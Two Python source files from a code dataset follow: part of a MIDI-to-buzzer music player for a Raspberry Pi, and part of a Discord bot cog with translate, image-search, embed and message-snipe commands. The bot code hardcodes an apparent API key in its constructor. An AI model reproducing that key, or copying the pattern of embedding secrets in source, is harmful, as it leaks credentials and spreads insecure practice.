self.tempos[1:]:\n\t\t\tif t >= tick:\n\t\t\t\tbreak\n\t\t\treal_time += (t - last_t) * last_r\n\t\t\tlast_t, last_r = t, ratio\n\t\treal_time += (tick - last_t) * last_r\n\t\treturn real_time\n\n\tdef process(self, file):\n\t\traw_midi = midi.read_midifile(file)\n\t\tself.res = raw_midi.resolution\n\t\traw_midi.make_ticks_abs()\n\n\t\ttempos = dict()\n\t\tfor track in raw_midi:\n\t\t\tfor e in track:\n\t\t\t\tif isinstance(e, midi.SetTempoEvent):\n\t\t\t\t\tspt = 60 / (e.get_bpm() * self.res)\n\t\t\t\t\tt = e.tick\n\t\t\t\t\tif t in tempos:\n\t\t\t\t\t\tassert tempos[t] == spt, \\\n\t\t\t\t\t\t'Found different tempos at the same time'\\\n\t\t\t\t\t\t'{}: {} and {}'.format(t, tempos[t], spt)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttempos[t] = spt\n\n\t\tassert 0 in tempos, \"No speed at tick 0!\"\n\t\tself.tempos = sorted(tempos.items())\n\n\t\tchannel_dicts = defaultdict(lambda:defaultdict(lambda:defaultdict(set)))\n\t\tmax_t = -1\n\t\tfor track in raw_midi:\n\t\t\tfor e in track:\n\t\t\t\tif not (isinstance(e, midi.NoteOnEvent) or isinstance(e, midi.NoteOffEvent)):\n\t\t\t\t\tcontinue\n\n\t\t\t\tt = self.get_time(e.tick)\n\t\t\t\tmax_t = max(max_t, t)\n\t\t\t\tpitch = e.get_pitch()\n\t\t\t\tis_on = isinstance(e, midi.NoteOnEvent) and e.get_velocity() > 0\n\t\t\t\tch = e.channel\n\n\t\t\t\tchannel_dicts[ch][pitch][t]=is_on\n\n\t\tassert max_t > 0, \"No pitch detected!\"\n\t\tself.max_t = max_t + 1\n\t\tself.ch_dicts = [\n\t\t\t{p: sorted(defd.items()) for p, defd in channel_dicts[ch].items()}\n\t\t\tfor ch in sorted(channel_dicts)]\n\t\tfor cd in self.ch_dicts:\n\t\t\tremove_notes = []\n\t\t\tfor p in cd:\n\t\t\t\tls = []\n\t\t\t\tlast_on = False\n\t\t\t\tfor t, is_on in cd[p]:\n\t\t\t\t\tif is_on == False and last_on == False:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tls.append((t, is_on))\n\t\t\t\t\tlast_on = is_on\n\t\t\t\tif not ls:\n\t\t\t\t\tremove_notes.append(p)\n\t\t\t\telse:\n\t\t\t\t\tcd[p] = ls\n\t\t\tfor p in remove_notes:\n\t\t\t\tdel cd[p]\n\n\t\tself.ch_dicts = [c for c in self.ch_dicts if c]\n\n\t\t#print(len(self.ch_dicts))\n\t\tassert self.ch_dicts, \"Error! No note detected.\"\n\t\tassert all(p[-1][-1] == False for d in self.ch_dicts for p in d.values()),\\\n\t\t\"Error! 
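A toy run of `MIDINotes.merge()` above shows the cross-channel behaviour: a pitch held on any channel stays on, each new channel onset re-triggers the note, and the final off waits until every channel has released it:

```python
ch_a = {60: [(0.0, True), (2.0, False)]}   # channel A holds middle C from 0s to 2s
ch_b = {60: [(1.0, True), (3.0, False)]}   # channel B overlaps it from 1s to 3s
merged = MIDINotes.merge([ch_a, ch_b])     # staticmethod defined above
print(merged[60])  # [(0.0, True), (1.0, True), (3.0, False)]
```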
Pitch not ended.\"\n\n\t\tself.merged_cd = MIDINotes.merge(self.ch_dicts)\n\t\t#print(self.mc_events())\n\n\t\tself.lyrics = []\n\n\t\tx = file.rfind('.')\n\t\ttext_name = file[:x] + '.txt'\n\t\tself.font = None\n\t\tself.font_size = None\n\t\tif os.path.isfile(text_name):\n\t\t\twith open(text_name, 'r', encoding = 'utf-8') as f:\n\t\t\t\ttext_list = []\n\t\t\t\tfor line in f.readlines():\n\t\t\t\t\tif line[-1] == '\\n':\n\t\t\t\t\t\tline = line[:-1]\n\t\t\t\t\tif line == '' or line[0] == '#':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif line.startswith('font: '):\n\t\t\t\t\t\tself.font = line[6:]\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif line.startswith('font_size: '):\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tself.font_size = int(line[11:])\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\tprint(\"[MIDINotes] Error in font_size: can't convert \\\"{}\\\" to int.\".format(line[11:]))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tr = line.find('\\t')\n\t\t\t\t\tif r == -1:\n\t\t\t\t\t\tprint(\"[MIDINotes] Error in lyric: can't find tab in \\\"{}\\\"\".format(line))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\ttry:\n\t\t\t\t\t\tnbeat = float(line[:r])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tprint(\"[MIDINotes] Error in lyric: can't convert \\\"{}\\\" to float.\".format(line[:r]))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\ttext_list.append((self.get_time(nbeat * self.res), line[r+1:]))\n\t\t\t\tself.lyrics = [(t, txt, None, EventKind.LYRIC, 0) for t, txt in text_list]\n\n\tdef lyric_events(self):\n\t\treturn self.lyrics\n\n\tdef mc_events(self):\n\t\tnote_list = []\n\t\tnotes = self.merged_cd.keys()\n\n\t\tmax_note = max(notes)\n\t\tmin_note = min(notes)\n\t\tNOTE_NUM = MCAPI.NOTE_NUM\n\t\tif self.same_note:\n\t\t\tzero_note = 30 # F#1 = 30 in midi\n\t\t\tif min_note < zero_note or max_note >= zero_note + NOTE_NUM:\n\t\t\t\tprint('Warning: The variety of the song is too large, can only play a part!')\n\t\telse:\n\t\t\tavan_list = []\n\t\t\tlen_dict = defaultdict(int)\n\t\t\tlen_dict.update((x, len(self.merged_cd[x])) for x in notes)\n\t\t\tif max_note - min_note >= NOTE_NUM:\n\t\t\t\tfor n in range(min_note, max_note - NOTE_NUM + 2):\n\t\t\t\t\tavan = sum(len_dict[i] for i in range(n, n+NOTE_NUM))\n\t\t\t\t\tavan_list.append((avan, n))\n\t\t\t\tavan_list.sort()\n\t\t\t\tzero_note = avan_list[-1][-1]\n\t\t\t\tprint('Warning: The variety of the song is too large, can only play a part!')\n\t\t\telse:\n\t\t\t\tzero_note = (min_note + max_note - NOTE_NUM + 1) // 2\n\n\t\tfor p in notes:\n\t\t\tif p < zero_note or p >= zero_note + NOTE_NUM:\n\t\t\t\tcontinue\n\t\t\tts = sorted(self.merged_cd[p])\n\t\t\tp -= zero_note\n\t\t\tlast_t = ts[0][0]\n\t\t\tassert ts[0][1], \"First note is off!\"\n\t\t\tnote_list.append((last_t, p, True, EventKind.MC, 0))\n\t\t\tlast_off = None\n\t\t\tfor t in ts[1:]:\n\t\t\t\tif not t[1]:\n\t\t\t\t\tif last_off is None:\n\t\t\t\t\t\tlast_off = t[0]\n\t\t\t\t\tcontinue\n\t\t\t\tt = t[0]\n\t\t\t\t# As short as possible\n\t\t\t\tt_end = last_t + min(0.25, (t - last_t) / 2)\n\t\t\t\tif last_off is not None:\n\t\t\t\t\tt_end = min(t_end, last_off)\n\t\t\t\t\tlast_off = None\n\t\t\t\tnote_list.append((t_end, p, False, EventKind.MC, 0))\n\t\t\t\tnote_list.append((t, p, True, EventKind.MC, 0))\n\t\t\t\tlast_t = t\n\t\t\tassert not ts[-1][1], \"Last note is on!\"\n\t\t\tnote_list.append((ts[-1][0], p, False, EventKind.MC, 0))\n\n\t\treturn note_list\n\n\tdef buzz_events(self):\n\t\t# ch_dicts : list of \"{note:[(t, is_on)...]}\"\n\n\t\tnotes = [(t, not is_on, -note, ch) \\\n\t\t\t\t\tfor ch, ch_dict in enumerate(self.ch_dicts) 
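The companion `.txt` lyric file parsed above (looked up next to the `.mid` file) uses a small line format: blank lines and `#` comments are skipped, optional `font:` and `font_size:` headers set the display font, and every other line is a tab-separated `<beats>\t<lyric>` pair. A sample the parser accepts, written to a hypothetical file:

```python
sample = (
    "# comment lines and blanks are skipped\n"
    "font: DejaVuSans.ttf\n"
    "font_size: 12\n"
    "0\tFirst line of lyrics\n"
    "8.5\tSecond line, shown at beat 8.5\n"
)
with open('song.txt', 'w', encoding='utf-8') as f:  # would sit next to song.mid
    f.write(sample)
```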
\\\n\t\t\t\t\tfor note, lst in ch_dict.items() \\\n\t\t\t\t\tfor t, is_on in lst\n\t\t\t\t]\n\t\tnotes.sort()\n\n\t\tbuzz_list = []\n\t\tnote_to_bch = dict()\n\t\tlast_time = dict()\n\t\tava_bch = set()\n\t\tnum_bch = 0\n\n\t\tfor t, is_off, mnote, ch in notes:\n\t\t\tnote = -mnote\n\t\t\tcur_bch = None\n\t\t\tif is_off:\n\t\t\t\tcur_bch = note_to_bch.pop((note, ch), None)\n\t\t\t\tif cur_bch is None:\n\t\t\t\t\tcontinue\n\t\t\t\tdel last_time[(note, ch)]\n\t\t\t\tava_bch.add(cur_bch)\n\t\t\telif (note, ch) in note_to_bch:\n\t\t\t\tcur_bch = note_to_bch[(note, ch)]\n\t\t\t\tmin_stime = (t + last_time[(note, ch)]) * 0.5\n\t\t\t\tlast_t = max(min_stime, t - 0.1)\n\t\t\t\tbuzz_list.append((last_t, note, False, EventKind.BUZZER, cur_bch))\n\t\t\t\tlast_time[(note, ch)] = t\n\t\t\t\tif ava_bch:\n\t\t\t\t\tnext_bch = min(ava_bch)\n\t\t\t\t\tava_bch.remove(next_bch)\n\t\t\t\t\tava_bch.add(cur_bch)\n\t\t\t\t\tcur_bch = next_bch\n\t\t\t\t\tnote_to_bch[(note, ch)] = cur_bch\n\t\t\telse:\n\t\t\t\tif ava_bch:\n\t\t\t\t\tcur_bch = min(ava_bch)\n\t\t\t\t\tava_bch.remove(cur_bch)\n\t\t\t\telse:\n\t\t\t\t\tcur_bch = num_bch\n\t\t\t\t\tnum_bch += 1\n\t\t\t\tnote_to_bch[(note, ch)] = cur_bch\n\t\t\t\tlast_time[(note, ch)] = t\n\t\t\tbuzz_list.append((t, note, not is_off, EventKind.BUZZER, cur_bch))\n\n\t\t#print(\"{} buzzers needed...\".format(num_bch))\n\n\t\treturn buzz_list\n\n\t@property\n\tdef valid(self):\n\t\treturn self._valid\n\n\t@property\n\tdef length(self):\n\t\treturn self.max_t\n\n\t@property\n\tdef lyric_font(self):\n\t\tif self.font_size is None:\n\t\t\treturn self.font\n\t\treturn (self.font, self.font_size)\n\n\tdef full_events(self, buzz_pfunc):\n\t\tbuzz_evt, nch = buzz_pfunc(self.buzz_events())\n\t\tnote_list = self.mc_events() + self.lyric_events() + buzz_evt\n\t\tnote_list.sort(key = lambda x:(x[0], x[1] if isinstance(x[1],int) else -1, -1 if x[2] is None else int(x[2]), x[3].value, x[4]))\n\t\treturn note_list, nch\n\n\t@staticmethod\n\tdef play(note_list, mc = None, buz = None, oled_q = None):\n\t\tt0 = time.time()\n\t\tlast_t = 0\n\n\t\tfor t, note, on, kind, channel in note_list:\n\t\t\t#print(note, t, on)\n\t\t\tif t > last_t:\n\t\t\t\ttime.sleep(max(t0 + t - time.time(), 0))\n\t\t\t\tlast_t = t\n\n\t\t\tif kind == EventKind.MC:\n\t\t\t\tmc.play_note(note, on)\n\t\t\telif kind == EventKind.BUZZER:\n\t\t\t\tbuz.play_note(note, on, channel)\n\t\t\telif kind == EventKind.LYRIC:\n\t\t\t\tmc.print(note)\n\t\t\t\toled_q.put(note)\n\n\t\toled_q.put('')\n\t\tbuz.reset()\n\nclass MultiBuzzer:\n\tdef __init__(self, pins):\n\t\t'''\n\t\tThe following implementation is deprecated.\n\t\tIt will have lower frequency pitch (may be caused by software delays).\n\n\t\tNotice that RPi.GPIO cannot control hardware PWMs,\n\t\tand thus GPIO.PWM runs on software PWM.\n\n\t\tThe reason not using hardware PWM is that there are too few of them:\n\t\tWe ONLY have TWO PWMs on a raspi 3B+ !!!\n\n\t\tLet's just write our own PWM instead...\n\n\t\tdef gpio_thread(pin, q):\n\t\t\tp = GPIO.PWM(pin, 440)\n\t\t\tcur_freq = q.get()\n\t\t\twhile cur_freq is not None:\n\t\t\t\tif cur_freq != -1:\n\t\t\t\t\tp.ChangeFrequency(cur_freq)\n\t\t\t\t\tp.start(50)\n\t\t\t\tcur_freq = q.get()\n\t\t\t\tp.stop()\n\t\t\tdel p\n\t\t'''\n\n\t\tdef gpio(pin, q):\n\t\t\t# GPIO.output(pin, GPIO.LOW)\n\t\t\tcur_freq = -1\n\t\t\tcur_stat = GPIO.LOW\n\t\t\tt = 0\n\t\t\twhile True:\n\t\t\t\twhile cur_freq == -1:\n\t\t\t\t\tcur_freq = q.get()\n\n\t\t\t\tif cur_freq is None:\n\t\t\t\t\tbreak\n\n\t\t\t\thcyc = 0.5 / cur_freq\n\t\t\t\tt = 
time.time()\n\t\t\t\twhile q.empty():\n\t\t\t\t\tt += hcyc\n\t\t\t\t\tcur_stat = GPIO.HIGH if cur_stat == GPIO.LOW else GPIO.LOW\n\t\t\t\t\ttime.sleep(max(t - time.time(), 0))\n\t\t\t\t\tGPIO.output(pin, cur_stat)\n\t\t\t\tcur_freq = q.get()\n\n\t\tGPIO.setmode(GPIO.BCM)\n\t\tGPIO.setwarnings(False)\n\t\tself.pins = pins\n\t\tfor p in pins:\n\t\t\tGPIO.setup(p, GPIO.OUT, initial=GPIO.LOW)\n\t\tself.queues = [Queue() for _ in pins]\n\t\tself.processes = [Proc(target = gpio, args=(pin, q)) for pin, q in zip(pins, self.queues)]\n\t\tfor p in self.processes:\n\t\t\tp.start()\n\n\tdef play_note(self, note, is_on, ch):\n\t\tself.queues[ch].put(NOTES[note] if is_on else -1)\n\n\tdef reset(self):\n\t\tfor q in self.queues:\n\t\t\tq.put(-1)\n\n\t\tfor q in self.queues:\n\t\t\twhile not q.empty():\n\t\t\t\tpass\n\n\tdef stop(self):\n\t\tfor q in self.queues:\n\t\t\tq.put(None)\n\t\tfor p in self.processes:\n\t\t\tp.join()\n\n\tdef proc_buz(self, buzz_list):\n\t\tch_num = max(b[-1] for b in buzz_list) + 1\n\t\tpnum = len(self.pins)\n\t\tif ch_num > pnum:\n\t\t\tprint(\"[MultiBuzzer] Warning: Needs {} channels but only have {}\".format(ch_num, pnum))\n\t\treturn [b for b in buzz_list if b[-1] < pnum], ch_num\n\n'''\nclass MultiBuzzer2:\n\tdef __init__(self, pins):\n\t\tGPIO.setmode(GPIO.BCM)\n\t\tGPIO.setwarnings(False)\n\t\tself.pins = pins\n\t\tfor p in pins:\n\t\t\tGPIO.setup(p, GPIO.OUT, initial=GPIO.LOW)\n\n\tdef play_note(self, note, is_on, ch):\n\t\tGPIO.output(ch, is_on)\n\n\tdef reset(self):\n\t\tpass\n\n\tdef stop(self):\n\t\tpass\n\n\tdef proc_buz(self, buzz_list):\n\t\tdef try_add(cur_list, last_t, on, bch, delta):\n\t\t\tbch = self.pins[bch]\n\t\t\ton = GPIO.HIGH if on else GPIO.LOW\n\t\t\tif not cur_list:\n\t\t\t\tcur_list.append((last_t, -1, on, EventKind.BUZZER, bch))\n\t\t\t\treturn\n\n\t\t\tst = 0\n\t\t\ted = len(cur_list)\n\t\t\twhile st < ed:\n\t\t\t\tmd = (st + ed) // 2\n\t\t\t\tnmd = cur_list[md][0]\n\t\t\t\tif nmd < last_t - delta:\n\t\t\t\t\tst = md + 1\n\t\t\t\telif nmd > last_t + delta:\n\t\t\t\t\ted = md\n\t\t\t\telse:\n\t\t\t\t\tlast_t = nmd\n\t\t\t\t\tst = md + 1\n\t\t\t\t\tbreak\n\t\t\tcur_list.insert(st, (last_t, -1, on, EventKind.BUZZER, bch))\n\n\t\tif not buzz_list:\n\t\t\treturn buzz_list\n\t\tbuzz_list.sort()\n\t\tnum_ch = max(i[-1] for i in buzz_list) + 1\n\t\t_num_ch = num_ch\n\t\tpnum = len(self.pins)\n\t\tif num_ch > pnum:\n\t\t\tprint(\"[MultiBuzzer2] Warning: Needs {} channels but only have {}\".format(num_ch, pnum))\n\t\t\tnum_ch = pnum\n\t\tnew_blist = []\n\t\tfor ch in range(num_ch):\n\t\t\tprint(\"Processing ch {}/{}\".format(ch, num_ch))\n\t\t\tlast_t = -1\n\t\t\tlast_note = None\n\t\t\tcur_stat = False\n\t\t\tfor t, note, on, _, bch in buzz_list:\n\t\t\t\tif bch != ch:\n\t\t\t\t\tcontinue\n\t\t\t\tif last_note is not None:\n\t\t\t\t\thcyc = 0.5 / last_note\n\t\t\t\t\twhile last_t < t:\n\t\t\t\t\t\ttry_add(new_blist, last_t, cur_stat, bch, hcyc / 300)\n\t\t\t\t\t\tlast_t += hcyc\n\t\t\t\t\t\tcur_stat = not cur_stat\n\n\t\t\t\tif not on:\n\t\t\t\t\tassert NOTES[note] == last_note\n\t\t\t\t\tlast_note = None\n\t\t\t\telse:\n\t\t\t\t\tlast_note = NOTES[note]\n\t\t\t\t\tlast_t = t\n\t\t\tassert last_note is None\n\t\treturn new_blist, _num_ch\n'''\n","repo_name":"RyanWei0224/WinterOlymProject","sub_path":"lib/music_lib.py","file_name":"music_lib.py","file_ext":"py","file_size_in_byte":15027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9680867530","text":"from discord.ext import commands\nimport 
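The bit-banged PWM loop in `gpio()` above flips the pin level once per half period, so pitch accuracy is bounded by `time.sleep()` granularity on the Pi. For reference, the half-cycle arithmetic for a 440 Hz tone:

```python
f = 440.0                     # example pitch in Hz
hcyc = 0.5 / f                # seconds between GPIO level toggles, as in gpio() above
print(round(hcyc * 1e3, 3))   # 1.136 ms half period, i.e. ~2.273 ms per full square wave
```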
discord\nfrom deep_translator import GoogleTranslator\nfrom rivalapi.rivalapi import RivalAPI\nfrom utils.paginator import Paginator\nimport re\nfrom utils.embed import to_object, embed_replacement\nfrom typing import Union\n\ncolor = 0x2b2d31\n\nclass Miscellaneous(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.rival=RivalAPI('63176c61-4622-4f42-8eaf-76f93f7841a3')\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(f\"{self.__class__.__name__} cog has been loaded\\n-----\")\n\n @commands.command(\n name='invite',\n description='View the bot invite',\n usage='Syntax: invite',\n aliases=['inv']\n )\n async def invite(self, ctx):\n await ctx.typing()\n\n inv = 'https://discord.com/api/oauth2/authorize?client_id=1075226332935503913&permissions=8&scope=bot'\n await ctx.success(f'Click **[here]({inv})** to invite **{self.bot.user.name}**')\n\n @commands.command(\n name='afk',\n description='Set you away message for when you\\'re mentioned',\n brief='status',\n usage='Syntax: <status>',\n aliases=['sleep', 'away']\n )\n async def afk(self, ctx, *, status: str = 'AFK'):\n await ctx.typing()\n\n timestamp = int(round(discord.utils.utcnow().timestamp()))\n await self.bot.db.execute('INSERT INTO afk (author, status, timestamp) VALUES ($1, $2, $3)', ctx.author.id, status, timestamp)\n await ctx.success(f'You\\'re now **AFK** with the status: **{status}**')\n\n @commands.command(\n name='translate',\n description='Transalte any text to a different language',\n brief='language, text',\n usage=\n 'Syntax: (language) (text)\\n'\n 'Example: spanish How are you?'\n )\n async def translate(self, ctx, language: str, *, text: str):\n await ctx.typing()\n\n trans=GoogleTranslator(\n source='auto',\n target=language\n )\n await ctx.success(trans.translate(text=text))\n \n @commands.command(\n name='image',\n description='Search Google for an image',\n brief='query',\n usage=\n 'Syntax: image (query)\\n'\n 'Example: J. 
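The `translate` command above delegates to deep_translator's `GoogleTranslator`; `source='auto'` lets the backend detect the input language, and `target` accepts a language name or ISO code. A standalone equivalent of what the command does (this performs a network call to Google Translate):

```python
from deep_translator import GoogleTranslator

text = GoogleTranslator(source='auto', target='es').translate(text='How are you?')
print(text)  # e.g. '¿Cómo estás?'
```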
Cole',\n aliases=['img', 'i', 'im']\n )\n async def image(self, ctx, *, query):\n await ctx.typing()\n\n data = await self.rival.google_images(query=query, safe=True)\n embeds = []\n for pagenum,i in enumerate(data.results,start=1):\n total=len(data.results)\n embeds.append(discord.Embed(\n color=color,\n title=f'{query}',\n description=f\"[{i.title}]({i.domain})\",url=i.source).set_image(url=i.url)\n .set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n .set_footer(text=f'Page {pagenum}/{total}')\n )\n pag = Paginator(self.bot, embeds, ctx, invoker=ctx.author.id)\n pag.add_button('prev', emoji='<:void_previous:1082283002207424572>')\n pag.add_button('goto', emoji='<:void_goto:1082282999187517490>')\n pag.add_button('next', emoji='<:void_next:1082283004321341511>')\n pag.add_button('delete', emoji='<:void_cross:1082283006649188435>')\n await pag.start()\n \n # @commands.command(\n # name='lookup',\n # description='Look up recently changed usernames',\n # brief='discriminator',\n # usage=\n # 'Syntax: <discriminator>\\n'\n # 'Example: 9999',\n # aliases=['tags']\n # )\n # async def lookup(self, ctx, lookup = None):\n # await ctx.typing()\n\n # lookup = '0001' if lookup is None else lookup\n # tags = await self.rival.tags(discriminator=lookup)\n # if tags is None:\n # await ctx.success(f'> No recent **{lookup}** tags')\n # embeds = []\n # ret = []\n # num = 0\n # pagenum = 0\n # for t in tags:\n # t=t.replace(\"**\",\"\")\n # num += 1\n # ret.append(f'**{num}.** {t}')\n # pages = [p for p in discord.utils.as_chunks(ret, 10)]\n # for page in pages:\n # pagenum += 1\n # embeds.append(discord.Embed(\n # color=color,\n # title=f'Recently available {lookup} tags',\n # description=\"\\n\".join(page))\n # .set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n # .set_footer(text=f'Page {pagenum}/{len(pages)}')\n # )\n # if len(embeds) == 1:\n # return await ctx.send(embed=embeds[0])\n # else:\n # pag = Paginator(self.bot, embeds, ctx, invoker=ctx.author.id)\n # pag.add_button('prev', emoji='<:void_previous:1082283002207424572>')\n # pag.add_button('goto', emoji='<:void_goto:1082282999187517490>')\n # pag.add_button('next', emoji='<:void_next:1082283004321341511>')\n # pag.add_button('delete', emoji='<:void_cross:1082283006649188435>')\n # await pag.start()\n\n @commands.command(\n name='createembed',\n description='Create a custom embed',\n brief='code',\n usage=\n 'Syntax: (embed code)\\n'\n 'Example: {title: void}$v{description: into the void}',\n aliases=['customembed', 'ce']\n )\n async def createembed(self, ctx, *, embed = None):\n await ctx.typing()\n\n if not embed: return await ctx.send_help(ctx.command)\n result = await to_object(embed)\n embed = result['embed']\n if embed:\n if embed.title:\n embed.title = await embed_replacement(ctx.author, embed.title)\n if embed.description:\n embed.description = await embed_replacement(ctx.author, embed.description)\n if embed.footer:\n if embed.footer.text and embed.footer.icon_url:\n embed.set_footer(text=await embed_replacement(ctx.author, embed.footer.text), icon_url=await embed_replacement(ctx.author, embed.footer.icon_url))\n elif embed.footer.text:\n embed.set_footer(text=await embed_replacement(ctx.author, embed.footer.text))\n elif embed.footer.icon_url:\n embed.set_footer(icon_url=await embed_replacement(ctx.author, embed.footer.icon_url))\n if embed.author:\n if embed.author.name and embed.author.icon_url:\n embed.set_author(name=await embed_replacement(ctx.author, embed.author.name), 
icon_url=await embed_replacement(ctx.author, embed.author.icon_url))\n elif embed.author.name:\n embed.set_author(name=await embed_replacement(ctx.author, embed.author.name))\n elif embed.author.icon_url:\n embed.set_author(icon_url=await embed_replacement(ctx.author, embed.author.icon_url))\n if embed.fields:\n for field in embed.fields:\n if field.name:\n embed.set_field_at(index=embed.fields.index(field), name=await embed_replacement(ctx.author, field.name), value=await embed_replacement(ctx.author, field.value), inline=field.inline)\n if embed.image:\n embed.set_image(url=await embed_replacement(ctx.author, embed.image.url))\n if embed.thumbnail:\n embed.set_thumbnail(url=await embed_replacement(ctx.author, embed.thumbnail.url))\n content = result['content']\n if content:\n content = await embed_replacement(ctx.author, content)\n msg = await ctx.send(content=content, embed=embed, view=result['view'], files=result['files'], delete_after=result['delete_after'], allowed_mentions=discord.AllowedMentions(users=True, everyone=False))\n\n @commands.command(\n name='snipe',\n description='View deleted messages',\n brief='index',\n usage=\n 'Syntax: <index>\\n'\n 'Example: 2',\n aliases=['sn', 's']\n )\n async def snipe(self, ctx, page: int = 1):\n from datetime import datetime\n await ctx.typing()\n\n messages_per_page = 1 # Change this number to adjust the number of messages per page\n offset = (page - 1) * messages_per_page\n count = await self.bot.db.fetchval(\"SELECT COUNT(*) FROM snipe WHERE channel_id = $1\", ctx.channel.id)\n total_pages = (count + messages_per_page - 1) // messages_per_page\n data = await self.bot.db.fetch(\n \"SELECT * FROM snipe WHERE channel_id = $1 ORDER BY id DESC LIMIT $2 OFFSET $3\",\n ctx.channel.id, messages_per_page, offset\n )\n if not data:\n return await ctx.success(\"No deleted messages found\")\n if data:\n author = await self.bot.fetch_user(data[0][3])\n content = data[0][4]\n e = discord.Embed(\n timestamp=datetime.utcnow(),\n color=color,\n description=content\n )\n e.set_author(name=f'{author.name}', icon_url=author.display_avatar)\n e.set_footer(text=f\"Page {page}/{total_pages}\")\n if data[0][5]: # If there is an attachment in the message\n if data[0][6] in [\"image\", \"video\", \"gif\"]: # If the attachment is an image, video, or gif\n e.set_image(url=data[0][5])\n elif data[0][6] == \"audio\": # If the attachment is audio\n e.add_field(name=\"Attachment\", value=f\"[{data[0][5]}]({data[0][5]})\")\n else: # If the attachment is another type\n e.add_field(name=\"Attachment\", value=data[0][5])\n await ctx.send(embed=e)\n\n @commands.command(\n name='editsnipe',\n description='View edited messages',\n brief='index',\n usage=\n 'Syntax: <index>\\n'\n 'Example: 2',\n aliases=['esnipe', 'es', 'eh']\n )\n async def editsnipe(self, ctx, page: int = 1):\n from datetime import datetime\n await ctx.typing()\n\n messages_per_page = 1 # Change this number to adjust the number of messages per page\n offset = (page - 1) * messages_per_page\n count = await self.bot.db.fetchval(\"SELECT COUNT(*) FROM editsnipe WHERE channel_id = $1\", ctx.channel.id)\n total_pages = (count + messages_per_page - 1) // messages_per_page\n data = await self.bot.db.fetch(\n \"SELECT * FROM editsnipe WHERE channel_id = $1 ORDER BY id DESC LIMIT $2 OFFSET $3\",\n ctx.channel.id, messages_per_page, offset\n )\n if not data:\n return await ctx.success(\"No edited messages found\")\n author = await self.bot.fetch_user(data[0][3])\n content = data[0][4]\n e = discord.Embed(\n 
timestamp=datetime.utcnow(),\n color=color,\n description=content\n )\n e.set_author(name=f'{author.name}', icon_url=author.display_avatar)\n e.set_footer(text=f\"Page {page}/{total_pages}\")\n if data[0][5]: # If there is an attachment in the message\n if data[0][6] in [\"image\", \"video\", \"gif\"]: # If the attachment is an image, video, or gif\n e.set_image(url=data[0][5])\n elif data[0][6] == \"audio\": # If the attachment is audio\n e.add_field(name=\"Attachment\", value=f\"[{data[0][5]}]({data[0][5]})\")\n else: # If the attachment is another type\n e.add_field(name=\"Attachment\", value=data[0][5])\n await ctx.send(embed=e)\n\n @commands.command(\n name='reactionsnipe',\n description='View removed reactions',\n brief='message, index',\n usage=\n 'Syntax: (message) <index>\\n'\n 'Example: 1080672479426646136 2',\n aliases=['rsnipe', 'rs', 'rh']\n )\n async def reactionsnipe(self, ctx, message_id: int, page: int = 1):\n from datetime import datetime\n await ctx.typing()\n\n messages_per_page = 1\n offset = (page - 1) * messages_per_page\n count = await self.bot.db.fetchval(\"SELECT COUNT(*) FROM reactionsnipe WHERE message_id = $1\", message_id)\n total_pages = (count + messages_per_page - 1) // messages_per_page\n data = await self.bot.db.fetch(\n \"SELECT * FROM reactionsnipe WHERE message_id = $1 ORDER BY id DESC LIMIT $2 OFFSET $3\",\n message_id, messages_per_page, offset\n )\n if not data:\n return await ctx.success(\"No removed reactions found\")\n removed_reactions_str = \"\"\n author = await self.bot.fetch_user(data[0][4])\n reaction = data[0][5]\n channel_id = data[0][2]\n channel = self.bot.get_channel(channel_id)\n if reaction.startswith(\"<\") and reaction.endswith(\">\"): # Custom emote\n emoji_id = int(reaction.split(\":\")[2][:-1])\n emoji = await ctx.guild.fetch_emoji(emoji_id)\n else:\n emoji = reaction\n message_url = f\"https://discord.com/channels/{ctx.guild.id}/{channel.id}/{message_id}\"\n removed_reactions_str += f\"[{emoji}]({message_url})\\n\"\n e = discord.Embed(\n description=removed_reactions_str,\n color=color,\n timestamp=datetime.utcnow()\n )\n e.set_author(name=f'{author.name}', icon_url=author.display_avatar)\n e.set_footer(text=f\"Page {page}/{total_pages}\")\n await ctx.send(embed=e)\n\n @commands.command(\n name='clearsnipes',\n description='Clear deleted channel messages from the database',\n usage='Syntax: ',\n aliases=['clearsnipe', 'cs']\n )\n @commands.has_permissions(manage_messages=True)\n async def clearsnipes(self, ctx):\n await self.bot.db.execute('DELETE FROM snipe WHERE guild_id = $1', ctx.guild.id)\n await self.bot.db.execute('DELETE FROM editsnipe WHERE guild_id = $1', ctx.guild.id)\n await self.bot.db.execute('DELETE FROM reactionsnipe WHERE guild_id = $1', ctx.guild.id)\n await ctx.message.add_reaction('👍🏾')\n\n @commands.command(\n name='names',\n description='Display a member\\'s name history',\n brief='user',\n usage=\n 'Syntax: <user>\\n'\n 'Example: @court#9000'\n )\n async def names(self, ctx, member: Union[discord.Member, discord.User] = None):\n member = ctx.author if member is None else member\n await ctx.typing()\n\n data = await self.bot.db.fetch('SELECT username, discriminator, timestamp FROM names WHERE user_id = $1 ORDER BY timestamp DESC', member.id)\n if not data:\n return await ctx.success(f\"No previously recorded names for {member.mention}\")\n embeds = []\n ret = []\n num = 0\n pagenum = 0\n for row in data:\n num += 1\n ret.append(f'**{num}.** {row[\"username\"]}#{row[\"discriminator\"]} - 
